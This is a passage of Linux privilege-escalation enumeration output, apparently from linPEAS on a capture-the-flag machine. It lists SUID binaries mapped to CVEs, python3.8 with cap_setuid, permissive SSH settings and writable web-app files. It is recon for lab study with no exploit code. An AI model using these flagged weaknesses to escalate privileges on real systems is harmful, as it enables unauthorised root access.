-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core18/2066/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core18/2066/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /snap/core18/2074/usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /snap/core18/2074/usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /snap/core18/2074/usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 3267 Jan  6  2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2274 May 11  2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 May 11  2021 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 May 11  2021 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 May 11  2021 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13  2020 /usr/share/popularity-contest/debian-popcon.gpg


╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                                                                                                                                                                
passwd file: /etc/passwd
passwd file: /snap/core18/2066/etc/pam.d/passwd
passwd file: /snap/core18/2066/etc/passwd
passwd file: /snap/core18/2066/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2066/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2066/var/lib/extrausers/passwd
passwd file: /snap/core18/2074/etc/pam.d/passwd
passwd file: /snap/core18/2074/etc/passwd
passwd file: /snap/core18/2074/usr/share/bash-completion/completions/passwd
passwd file: /snap/core18/2074/usr/share/lintian/overrides/passwd
passwd file: /snap/core18/2074/var/lib/extrausers/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)                                                                                                                                                   
-rw-r--r-- 1 root root 598 Sep 23  2020 /etc/ssh/ssh_host_dsa_key.pub
-rw-r--r-- 1 root root 170 Sep 23  2020 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 90 Sep 23  2020 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 562 Sep 23  2020 /etc/ssh/ssh_host_rsa_key.pub

PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem                                                                                                                                                           
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/etc/ssl/certs/ACCVRAIZ1.pem
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
/etc/ssl/certs/AffirmTrust_Commercial.pem
/etc/ssl/certs/AffirmTrust_Networking.pem
/etc/ssl/certs/AffirmTrust_Premium.pem
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
/etc/ssl/certs/Amazon_Root_CA_1.pem
/etc/ssl/certs/Amazon_Root_CA_2.pem
/etc/ssl/certs/Amazon_Root_CA_3.pem
/etc/ssl/certs/Amazon_Root_CA_4.pem
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/CA_Disig_Root_R2.pem

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket                                                                                                                               
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config                                                                                                                                                                
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow                                                                                                                                                                              


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-sessions                                                                                                        
tmux 3.0a                                                                                                                                                                                     

/tmp/tmux-1001

                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                                                                                                            
                      ╚════════════════════════════════════╝                                                                                                                                  
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                              
-rwsr-xr-x 1 root root 39K Jul 21  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)                                                                                                             
-rwsr-xr-x 1 root root 44K May 28  2020 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 31K Aug 16  2019 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
-rwsr-xr-x 1 root root 55K Jul 21  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 67K May 28  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 84K May 28  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 52K May 28  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Jul 21  2020 /usr/bin/su
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 23K Aug 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 128K Feb  2  2021 /usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 463K Mar  9  2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 109K Apr 24  2021 /snap/snapd/11841/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 109K Jun 15  2021 /snap/snapd/12398/usr/lib/snapd/snap-confine  --->  Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/2066/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/2066/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2066/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/2066/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2066/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2066/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/2066/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/2066/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19  2021 /snap/core18/2066/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11  2020 /snap/core18/2066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/2066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16  2020 /snap/core18/2074/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28  2019 /snap/core18/2074/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2074/bin/su
-rwsr-xr-x 1 root root 27K Sep 16  2020 /snap/core18/2074/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2074/usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22  2019 /snap/core18/2074/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22  2019 /snap/core18/2074/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22  2019 /snap/core18/2074/usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22  2019 /snap/core18/2074/usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 19  2021 /snap/core18/2074/usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-resolve 42K Jun 11  2020 /snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar  4  2019 /snap/core18/2074/usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                              
-rwxr-sr-x 1 root shadow 83K May 28  2020 /usr/bin/chage                                                                                                                                      
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 31K May 28  2020 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root ssh 343K Mar  9  2021 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jul 21  2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 43K Apr  8  2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Apr  8  2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21  2020 /snap/core18/2066/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Jul 21  2020 /snap/core18/2066/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22  2019 /snap/core18/2066/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22  2019 /snap/core18/2066/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar  4  2019 /snap/core18/2066/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16  2020 /snap/core18/2066/usr/bin/wall
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /snap/core18/2074/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /snap/core18/2074/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22  2019 /snap/core18/2074/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22  2019 /snap/core18/2074/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar  4  2019 /snap/core18/2074/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Sep 16  2020 /snap/core18/2074/usr/bin/wall

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls                                                                                                                       
files with acls in searched folders Not Found                                                                                                                                                 
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                                               
══╣ Current shell capabilities                                                                                                                                                                
CapInh:  0x0000000000000000=                                                                                                                                                                  
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=

╚ Parent process capabilities
CapInh:  0x0000000000000000=                                                                                                                                                                  
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                                               
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so                                                                                                                      
/etc/ld.so.conf                                                                                                                                                                               
Content of /etc/ld.so.conf:                                                                                                                                                                   
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf                                                                                                                                            
  - /usr/lib/x86_64-linux-gnu/libfakeroot                                                                                                                                                     
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib                                                                                                                                                                            
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu                                                                                                                                                           
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/                                                                                                                                               
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files                                                                                                             
total 36                                                                                                                                                                                      
drwxr-xr-x  2 root root 4096 May 23  2021 .
drwxr-xr-x 92 root root 4096 Jul 23  2021 ..
-rw-r--r--  1 root root   96 Dec  5  2019 01-locale-fix.sh
-rw-r--r--  1 root root 1557 Feb 17  2020 Z97-byobu.sh
-rw-r--r--  1 root root  833 Feb  2  2021 apps-bin-path.sh
-rw-r--r--  1 root root  729 Feb  2  2020 bash_completion.sh
-rw-r--r--  1 root root 1003 Aug 13  2019 cedilla-portuguese.sh
-rw-r--r--  1 root root 1107 Nov  3  2019 gawk.csh
-rw-r--r--  1 root root  757 Nov  3  2019 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                                                                               
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3222 Mar 11  2020 sbin.dhclient                                                                                                                                       
-rw-r--r-- 1 root root  3202 Feb 25  2020 usr.bin.man
-rw-r--r-- 1 root root 26703 Feb  2  2021 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root  1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root  1385 Dec  7  2019 usr.sbin.tcpdump

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No                                                                                                                                                  
═╣ Credentials in fstab/mtab? ........... No                                                                                                                                                  
═╣ Can I read shadow files? ............. No                                                                                                                                                  
═╣ Can I read shadow plists? ............ No                                                                                                                                                  
═╣ Can I write shadow plists? ........... No                                                                                                                                                  
═╣ Can I read opasswd file? ............. No                                                                                                                                                  
═╣ Can I write in network-scripts? ...... No                                                                                                                                                  
═╣ Can I read root folder? .............. No                                                                                                                                                  
╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                                                                                                                        
/home/nathan/.bash_history
/home/nathan/.viminfo
/root/
/var/www
/var/www/html/templates
/var/www/html/templates/index.html
/var/www/html/upload
/var/www/html/upload/0.pcap
/var/www/html/static
/var/www/html/static/js
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
/var/www/html/static/js/vendor
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js
/var/www/html/static/js/pie-chart.js
/var/www/html/static/js/line-chart.js
/var/www/html/static/js/popper.min.js
/var/www/html/static/js/owl.carousel.min.js
/var/www/html/static/js/maps.js
/var/www/html/static/css
/var/www/html/static/css/bootstrap.min.css
/var/www/html/static/css/typography.css
/var/www/html/static/css/default-css.css

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r-- 1 root    root    9935 May 15  2021 0.pcap                                                                                                                                         
-rw-r--r-- 1 root root 19985 May 20  2021 index.html
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:07 3.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:11 1.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:12 4.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:18 5.pcap
-rw-r--r-- 1 tcpdump tcpdump  108 Nov  7 07:18 6.pcap
-rw-r--r-- 1 tcpdump tcpdump  360 Nov  7 07:18 7.pcap
-rw-r--r-- 1 tcpdump tcpdump 1234 Nov  7 04:44 2.pcap
drwxr-xr-x 2 root root 4096 May 23  2021 css
drwxr-xr-x 2 root root 4096 May 23  2021 fonts
drwxr-xr-x 3 root root 4096 May 23  2021 js
drwxr-xr-x 9 root root 4096 May 23  2021 images
total 16
total 20
total 40

╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                             
/dev/mqueue                                                                                                                                                                                   
/dev/shm
/home/nathan
/run/lock
/run/screen
/run/user/1001
/run/user/1001/dbus-1
/run/user/1001/dbus-1/services
/run/user/1001/gnupg
/run/user/1001/inaccessible
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/user/1001/systemd/units
/snap/core18/2066/tmp
/snap/core18/2066/var/tmp
/snap/core18/2074/tmp
/snap/core18/2074/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory

/var/crash
/var/tmp
/var/www/html
/var/www/html/__pycache__
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/app.py

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                             

                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════                                                                                                           
                            ╚═════════════════════════╝                                                                                                                                       
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                                                    
/usr/bin/gettext.sh                                                                                                                                                                           
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2021-05-15+21:40:28.2491426570 /usr/local/bin/gunicorn                                                                                                                                        
2021-05-15+21:40:28.2011395020 /usr/local/bin/flask
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_terminal.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_keyboard.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_font.sh

╔══════════╣ Unexpected in root
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/nathan/.gnupg/pubring.kbx                                                                                                                                                               
/home/nathan/.gnupg/trustdb.gpg
/home/nathan/snap/lxd/common/config/config.yml
/var/log/syslog
/var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal
/var/log/journal/06774f23bd654b25a296a616308d2acd/system.journal
/var/log/kern.log
/var/log/auth.log

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation                                                                                                     
logrotate 3.14.0                                                                                                                                                                              

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /home/nathan (limit 20)
total 36                                                                                                                                                                                      
drwxr-xr-x 5 nathan nathan 4096 Nov  7 14:06 .
drwxr-xr-x 3 root   root   4096 May 23  2021 ..
lrwxrwxrwx 1 root   root      9 May 15  2021 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 .bashrc
drwx------ 2 nathan nathan 4096 May 23  2021 .cache
drwx------ 3 nathan nathan 4096 Nov  7 14:06 .gnupg
-rw-r--r-- 1 nathan nathan  807 Feb 25  2020 .profile
lrwxrwxrwx 1 root   root      9 May 27  2021 .viminfo -> /dev/null
drwxr-xr-x 3 nathan nathan 4096 Nov  7 14:06 snap
-r-------- 1 nathan nathan   33 Nov  7 03:23 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/app.py                                                                                                                                                                          
/var/www/html/templates/index.html
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/upload/0.pcap
/var/www/html/upload/1.pcap
/var/www/html/upload/2.pcap
/var/www/html/upload/5.pcap
/var/www/html/upload/7.pcap
/var/www/html/upload/3.pcap
/var/www/html/upload/6.pcap
/var/www/html/upload/4.pcap
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js

╔══════════╣ Searching installed mail applications
                                                                                                                                                                                              
╔══════════╣ Mails (limit 50)
                                                                                                                                                                                              
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 3 Apr 24  2018 /snap/core18/2066/var/backups                                                                                                                           
total 0

drwxr-xr-x 2 root root 3 Apr 24  2018 /snap/core18/2074/var/backups
total 0

drwxr-xr-x 2 root root 4096 Nov  7 06:25 /var/backups
total 880
-rw-r--r-- 1 root root  51200 Nov  7 06:25 alternatives.tar.0
-rw-r--r-- 1 root root   2564 May 23  2021 alternatives.tar.1.gz
-rw-r--r-- 1 root root  34170 Jul 23  2021 apt.extended_states.0
-rw-r--r-- 1 root root   3854 May 23  2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root   3787 May 22  2021 apt.extended_states.2.gz
-rw-r--r-- 1 root root   3760 May 21  2021 apt.extended_states.3.gz
-rw-r--r-- 1 root root   3949 May 15  2021 apt.extended_states.4.gz
-rw-r--r-- 1 root root   3694 Sep 23  2020 apt.extended_states.5.gz
-rw-r--r-- 1 root root    268 Sep 23  2020 dpkg.diversions.0
-rw-r--r-- 1 root root    139 Sep 23  2020 dpkg.diversions.1.gz
-rw-r--r-- 1 root root    135 May 15  2021 dpkg.statoverride.0
-rw-r--r-- 1 root root    142 May 15  2021 dpkg.statoverride.1.gz
-rw-r--r-- 1 root root 610976 Jul 23  2021 dpkg.status.0
-rw-r--r-- 1 root root 155045 May 22  2021 dpkg.status.1.gz


╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz                                                                                                                 
-rw-r--r-- 1 root root 11886 May 23  2021 /usr/share/info/dir.old
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-80/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 0 Apr 14  2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Apr 14  2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Apr 14  2021 /usr/src/linux-headers-5.4.0-73-generic/.config.old
-rw-r--r-- 1 root root 0 Jul  9  2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Jul  9  2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Jul  9  2021 /usr/src/linux-headers-5.4.0-80-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-73/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 1403 May 23  2021 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 1775 Feb 25  2021 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 9833 Jul  9  2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Jul  9  2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9833 Apr 14  2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Apr 14  2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 44048 Mar 17  2021 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 2743 Jul 31  2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 678 Nov  7 03:23 /run/blkid/blkid.tab.old

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
